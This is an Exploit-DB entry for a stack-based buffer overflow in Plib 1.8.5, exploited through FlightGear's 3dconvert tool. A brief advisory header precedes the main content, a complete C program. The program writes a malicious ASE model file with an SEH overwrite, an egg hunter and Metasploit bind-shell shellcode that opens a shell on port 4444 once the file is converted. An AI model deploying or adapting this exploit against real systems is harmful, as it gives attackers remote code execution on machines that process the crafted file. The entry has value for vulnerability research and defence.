Plib + flightgear 3dconvert exploit

vendor:
by:
Andres Gomez
7.5
CVSS
HIGH
Stack-based Buffer Overflow
119
CWE
Product Name:
Affected Version From: Plib 1.8.5
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Service Pack 3 Spanish
2012
Plib + flightgear 3dconvert exploit

Plib is prone to stack based Buffer overflow in the error function in ssg/ssgParser.cxx when it loads 3d model files as X (Direct x), ASC, ASE, ATG, and OFF. This exploit uses flightgear's utility 3dconvert. It creates a corrupted ASE file "test.ase", just run: FlightGearbinWin323dconvert.exe test.ase test.obj
Mitigation:

Apply patches provided by the vendor.
Source
Exploit-DB raw data:

/* 
# Exploit Title: Plib + flightgear 3dconvert exploit
# Date: 08/10/2012
# Author: Andres Gomez
# Software Links: 
# Plib: http://plib.sourceforge.net/
# flightgear: http://www.flightgear.org/
# 3dconvert: ftp://ftp.ihg.uni-duisburg.de/FlightGear/Win32/old/3dconvert-win32.zip
# Version: Plib 1.8.5
# Tested on: Windows XP Service Pack 3 Spanish
*/

/* 

   Plib is prone to stack based Buffer overflow in the error function in ssg/ssgParser.cxx when it loads
   3d model files as X (Direct x), ASC, ASE, ATG, and OFF.

   This exploit uses flightgear's utility 3dconvert. It creates a corrupted ASE file "test.ase", just run:

   FlightGear\bin\Win32\3dconvert.exe test.ase test.obj

*/


#include <stdio.h>
#include <stdlib.h>

/*
   Shellcode: msfpayload windows/shell_bind_tcp LPORT=4444 R | ./msfencode -e x86/alpha_mixed C
*/

unsigned char shellcode[] = 
"\x89\xe0\xdd\xc6\xd9\x70\xf4\x5d\x55\x59\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
"\x42\x75\x4a\x49\x69\x6c\x5a\x48\x4f\x79\x33\x30\x75\x50"
"\x67\x70\x71\x70\x4b\x39\x78\x65\x45\x61\x4a\x72\x71\x74"
"\x6c\x4b\x76\x32\x44\x70\x4e\x6b\x73\x62\x46\x6c\x6e\x6b"
"\x36\x32\x66\x74\x4c\x4b\x50\x72\x47\x58\x36\x6f\x4c\x77"
"\x50\x4a\x54\x66\x35\x61\x79\x6f\x45\x61\x4b\x70\x6e\x4c"
"\x47\x4c\x31\x71\x33\x4c\x35\x52\x56\x4c\x31\x30\x6a\x61"
"\x58\x4f\x34\x4d\x45\x51\x79\x57\x4d\x32\x6c\x30\x32\x72"
"\x61\x47\x4e\x6b\x66\x32\x44\x50\x4e\x6b\x47\x32\x37\x4c"
"\x55\x51\x6e\x30\x6e\x6b\x61\x50\x32\x58\x6e\x65\x79\x50"
"\x34\x34\x73\x7a\x46\x61\x5a\x70\x46\x30\x6e\x6b\x72\x68"
"\x66\x78\x6c\x4b\x63\x68\x55\x70\x66\x61\x78\x53\x49\x73"
"\x75\x6c\x77\x39\x6c\x4b\x64\x74\x6c\x4b\x57\x71\x7a\x76"
"\x45\x61\x39\x6f\x76\x51\x6b\x70\x4e\x4c\x5a\x61\x68\x4f"
"\x64\x4d\x66\x61\x4a\x67\x45\x68\x39\x70\x70\x75\x5a\x54"
"\x43\x33\x51\x6d\x58\x78\x45\x6b\x71\x6d\x47\x54\x54\x35"
"\x7a\x42\x53\x68\x4e\x6b\x66\x38\x44\x64\x53\x31\x4e\x33"
"\x43\x56\x4c\x4b\x56\x6c\x32\x6b\x4e\x6b\x36\x38\x77\x6c"
"\x37\x71\x4a\x73\x6e\x6b\x66\x64\x4c\x4b\x46\x61\x78\x50"
"\x4c\x49\x50\x44\x36\x44\x71\x34\x63\x6b\x53\x6b\x33\x51"
"\x46\x39\x70\x5a\x70\x51\x49\x6f\x49\x70\x32\x78\x61\x4f"
"\x70\x5a\x6c\x4b\x67\x62\x6a\x4b\x4d\x56\x43\x6d\x52\x48"
"\x67\x43\x46\x52\x47\x70\x43\x30\x65\x38\x50\x77\x54\x33"
"\x45\x62\x31\x4f\x71\x44\x65\x38\x62\x6c\x53\x47\x34\x66"
"\x53\x37\x39\x6f\x7a\x75\x6d\x68\x4a\x30\x35\x51\x53\x30"
"\x45\x50\x76\x49\x78\x44\x46\x34\x56\x30\x72\x48\x56\x49"
"\x4b\x30\x62\x4b\x43\x30\x39\x6f\x48\x55\x42\x70\x50\x50"
"\x76\x30\x52\x70\x73\x70\x70\x50\x51\x50\x62\x70\x75\x38"
"\x39\x7a\x36\x6f\x6b\x6f\x39\x70\x69\x6f\x48\x55\x6e\x69"
"\x58\x47\x35\x61\x79\x4b\x66\x33\x30\x68\x56\x62\x73\x30"
"\x37\x61\x63\x6c\x6c\x49\x6a\x46\x62\x4a\x64\x50\x73\x66"
"\x72\x77\x51\x78\x6a\x62\x49\x4b\x46\x57\x42\x47\x4b\x4f"
"\x39\x45\x73\x63\x61\x47\x35\x38\x58\x37\x69\x79\x30\x38"
"\x59\x6f\x69\x6f\x4a\x75\x61\x43\x31\x43\x53\x67\x30\x68"
"\x62\x54\x68\x6c\x65\x6b\x69\x71\x59\x6f\x68\x55\x56\x37"
"\x4d\x59\x7a\x67\x53\x58\x71\x65\x72\x4e\x42\x6d\x45\x31"
"\x6b\x4f\x68\x55\x43\x58\x53\x53\x42\x4d\x35\x34\x77\x70"
"\x4c\x49\x69\x73\x42\x77\x42\x77\x70\x57\x46\x51\x49\x66"
"\x30\x6a\x64\x52\x56\x39\x66\x36\x68\x62\x69\x6d\x75\x36"
"\x78\x47\x67\x34\x61\x34\x57\x4c\x67\x71\x47\x71\x4e\x6d"
"\x63\x74\x54\x64\x36\x70\x48\x46\x53\x30\x42\x64\x72\x74"
"\x46\x30\x46\x36\x76\x36\x42\x76\x53\x76\x63\x66\x42\x6e"
"\x72\x76\x53\x66\x56\x33\x62\x76\x51\x78\x42\x59\x68\x4c"
"\x75\x6f\x6b\x36\x49\x6f\x48\x55\x4d\x59\x4b\x50\x32\x6e"
"\x36\x36\x61\x56\x49\x6f\x76\x50\x53\x58\x43\x38\x6f\x77"
"\x57\x6d\x35\x30\x6b\x4f\x4b\x65\x6d\x6b\x58\x70\x78\x35"
"\x4e\x42\x72\x76\x63\x58\x6f\x56\x4c\x55\x6d\x6d\x6d\x4d"
"\x6b\x4f\x39\x45\x55\x6c\x37\x76\x61\x6c\x45\x5a\x4b\x30"
"\x6b\x4b\x69\x70\x54\x35\x77\x75\x4f\x4b\x77\x37\x52\x33"
"\x52\x52\x32\x4f\x51\x7a\x77\x70\x30\x53\x59\x6f\x6a\x75"
"\x41\x41";

unsigned char egg_hunter [] = 
"\xdb\xd9\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a"
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"
"\x75\x4a\x49\x43\x56\x4e\x61\x6a\x6a\x4b\x4f\x54\x4f\x51"
"\x52\x76\x32\x42\x4a\x33\x73\x51\x48\x68\x4d\x56\x4e\x75"
"\x6c\x66\x65\x30\x5a\x71\x64\x78\x6f\x4e\x58\x5a\x30\x52"
"\x70\x6a\x30\x30\x50\x6c\x4b\x79\x6a\x6e\x4f\x34\x35\x7a"
"\x4a\x4c\x6f\x62\x55\x6d\x37\x49\x6f\x6a\x47\x41\x41";

unsigned char egg [] = "\x90\x50\x90\x50\x90\x50\x90\x50";
unsigned char seh_pointer [] = "\x49\x19\xE1\x08"; // seh pointer pop pop ret; 
unsigned char short_jump [] = "\xEB\x0C\x41\x41"; // short jump;

int main(int argc, char **argv) {

    FILE *save_fd;
    int i=0;

    save_fd = fopen("test.ase", "w+");

    if (save_fd == NULL) {
	    printf("Failed to open '%s' for writing", "test.ase");
	    return -1;
    }

    fprintf(save_fd,    "*3DSMAX_ASCIIEXPORT 200\n"
			"*COMMENT \"created by SSG.\"\n"
			"*SCENE {\n"
			"  *SCENE_FILENAME \"\"\n"
			"  *SCENE_FIRSTFRAME 0\n"
			"  *SCENE_LASTFRAME 100\n"
			"  *SCENE_FRAMESPEED 30\n"
			"  *SCENE_TICKSPERFRAME 160\n"
			"  *SCENE_BACKGROUND_STATIC 0.0000 0.0000 0.0000\n"
			"  *SCENE_AMBIENT_STATIC 0.0431 0.0431 0.0431\n"
			"}\n"
			"*MATERIAL_LIST {\n"
			"  *MATERIAL_COUNT 2\n"
			"  *MATERIAL 0 {\n"
			"    *MATERIAL_NAME \"Material #0\"\n"
			"    *MATERIAL_CLASS \"Standard\"\n"
			"    *MATERIAL_AMBIENT 1.000000 1.000000 1.000000\n"
			"    *MATERIAL_DIFFUSE 1.000000 1.000000 1.000000\n"
			"    *MATERIAL_SPECULAR 0.502000 0.502000 0.502000\n"
			"    *MATERIAL_SHINE 50.000000\n"
			"    *MATERIAL_SHINESTRENGTH 50.000000\n"
			"    *MATERIAL_TRANSPARENCY 0.000000\n"
			"    *MATERIAL_WIRESIZE 1.0000\n"
			"    *MATERIAL_SHADING Blinn\n"
			"    *MATERIAL_XP_FALLOFF 0.0000\n"
			"    *MATERIAL_SELFILLUM 0.0000\n"
			"    *MATERIAL_TWOSIDED\n"
			"    *MATERIAL_FALLOFF In\n"
			"    *MATERIAL_SOFTEN\n"
			"    *MATERIAL_XP_TYPE Filter\n"
			"	*SUBMATERIAL ");
    for(i=0; i < 573; i++) {
    	putc('\x41', save_fd);
    }
    fprintf(save_fd, "%s", short_jump);
    fprintf(save_fd, "%s", seh_pointer);
    for(i=0; i < 0x0F; i++) {
    	putc('\x90', save_fd);
    }

    fprintf(save_fd, "%s", egg_hunter);
    for(i=0; i < 573; i++) {
    	putc('\x41', save_fd);
    }
    fprintf(save_fd, "%s", egg);
    fprintf(save_fd, "%s", shellcode);
    
    fprintf(save_fd, " {\n");
    
    close(save_fd);

    return 0;
}